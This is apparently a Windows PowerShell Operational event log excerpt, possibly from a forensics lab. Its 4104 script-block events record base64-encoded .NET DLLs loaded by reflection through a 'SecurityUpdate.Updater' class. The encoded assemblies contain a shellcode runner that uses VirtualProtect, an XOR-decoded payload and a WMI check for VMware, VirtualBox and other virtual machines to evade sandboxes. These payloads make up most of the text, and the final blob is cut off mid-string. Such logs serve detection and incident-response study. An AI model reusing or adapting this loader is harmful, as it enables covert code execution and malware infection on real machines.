AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAABwDAAAAAAAAAAAAABwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAR8AgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABYAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAOgAJAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAHQAZQBzAHQAXwBkAGwAbAAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAOgANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAAB0AGUAcwB0AF8AZABsAGwALgBkAGwAbAAAAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMgAzAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABCAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAdABlAHMAdABfAGQAbABsAC4AZABsAGwAAAAAADIACQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAdABlAHMAdABfAGQAbABsAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAqDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">68b52918-7f63-44e5-bc15-306a91f7bc1f</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">40961</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>1</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 20:16:05.985413"></TimeCreated>
<EventRecordID>87</EventRecordID>
<Correlation ActivityID="{ebcf3844-53e0-0003-c93a-cfebe053d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4584" ThreadID="4588"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData></EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 20:19:38.037548"></TimeCreated>
<EventRecordID>102</EventRecordID>
<Correlation ActivityID="{ebcf3844-53e0-0001-1f4e-cfebe053d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4468" ThreadID="5448"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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RUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQBQQUdFX0VYRUNVVEUAUEFHRV9OT0FDQ0VTUwBQQUdFX1JFQURPTkxZAFBBR0VfV1JJVEVDT1BZAFBBR0VfRVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBtZXRob2QAc2hlbGxjb2RlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lRmllbGRIYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAVmFsdWVUeXBlAERpc3Bvc2UAU2VjdXJpdHlVcGRhdGUAU2hlbGxjb2RlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBBc3luY0NhbGxiYWNrAGNhbGxiYWNrAE1hcnNoYWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0ARW51bQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBNZW1vcnlQcm90ZWN0aW9uAFJ1bgBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IALmNjdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAENvbnRhaW5zAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBSdW50aW1lSGVscGVycwBscEFkZHJlc3MATWFuYWdlbWVudEJhc2VPYmplY3QATWFuYWdlbWVudE9iamVjdABvYmplY3QAbHBmbE9sZFByb3RlY3QAVmlydHVhbFByb3RlY3QAZmxOZXdQcm90ZWN0AEdldABvcF9FeHBsaWNpdABJQXN5bmNSZXN1bHQAcmVzdWx0AFRvVXBwZXJJbnZhcmlhbnQAU3lzdGVtLk1hbmFnZW1lbnQAZ2V0X0N1cnJlbnQATW92ZU5leHQASW5pdGlhbGl6ZUFycmF5AGtleQBvcF9FcXVhbGl0eQBTeXN0ZW0uU2VjdXJpdHkAAEVTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAAAZTQBhAG4AdQBmAGEAYwB0AHUAcgBlAHIAACttAGkAYwByAG8AcwBvAGYAdAAgAGMAbwByAHAAbwByAGEAdABpAG8AbgAAC00AbwBkAGUAbAAAD1YASQBSAFQAVQBBAEwAAA12AG0AdwBhAHIAZQAAFVYAaQByAHQAdQBhAGwAQgBvAHgAAAAAAJfu+fpX9upLomc2N49wqKYABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAQERQRgHDgISURJZEl0OAgIIAg8FRR0FGBEUEhAEIAASVQQgABJZBCAAEnkEIAEcDgMgAA4FAAICDg4EIAECDgMgAAIFAAEY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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">40d0760f-c12b-4652-8704-6e5cfdd2456d</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-13 02:43:07.168322"></TimeCreated>
<EventRecordID>117</EventRecordID>
<Correlation ActivityID="{8937ba5a-55a0-0001-23d7-3789a055d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="2288" ThreadID="6784"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGm0eeMAAAAAAAAAAOAAIiALATAAABoAAAAGAAAAAAAAqjIAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAFYyAABPAAAAAEAAAHgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADAMQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAyBkAAAAgAAAAGgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAHgDAAAAQAAAAAQAAAAcAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAIAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACKMgAAAAAAAEgAAAACAAUAOCIAAIgPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBgCEAQAAAQAAEQAWCnIBAABwcxIAAAoLAAAHbxMAAApvFAAACgw4igAAAAhvFQAACnQXAAABDQAJckcAAHBvFgAACm8XAAAKbxgAAAoTBBEEcmEAAHAoGQAACiwhCXKNAABwbxYAAApvFwAACm8aAAAKcpkAAHBvGwAACi0qEQRyqQAAcG8bAAAKLRwJco0AAHBvFgAACm8XAAAKcrcAAHAoGQAACisBFxMFEQUsBQAXCisMAAhvHAAACjpr////3gsILAcIbx0AAAoA3ADeCwcsBwdvHQAACgDcBhMGEQYsBgA4pQAAAAAWEwcrJQB+AQAABBEHfgEAAAQRB5F+AgAABBEHHyBdkWHSnAARBxdYEwcRB34BAAAEjmn+BBMIEQgtyn4BAAAEJRMKLAYRCo5pLQYW4BMJKwsRChaPIQAAAeATCQARCSgeAAAKEwsRC34BAAAEjmlqKB8AAAofQBIMKAIAAAYmEQvQBAAAAiggAAAKKCEAAAp0BAAAAhMNEQ1vBgAABgAAFBMKACoBHAAAAgAcAJy4AAsAAAAAAgAOALjGAAsAAAAAIgIoIgAACgAqyiD3BgAAjSEAAAEl0AMAAAQoIwAACoABAAAEHyCNIQAAASXQBAAABCgjAAAKgAIAAAQqQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAwAQAACN+AAAsBQAA8AYAACNTdHJpbmdzAAAAABwMAADQAAAAI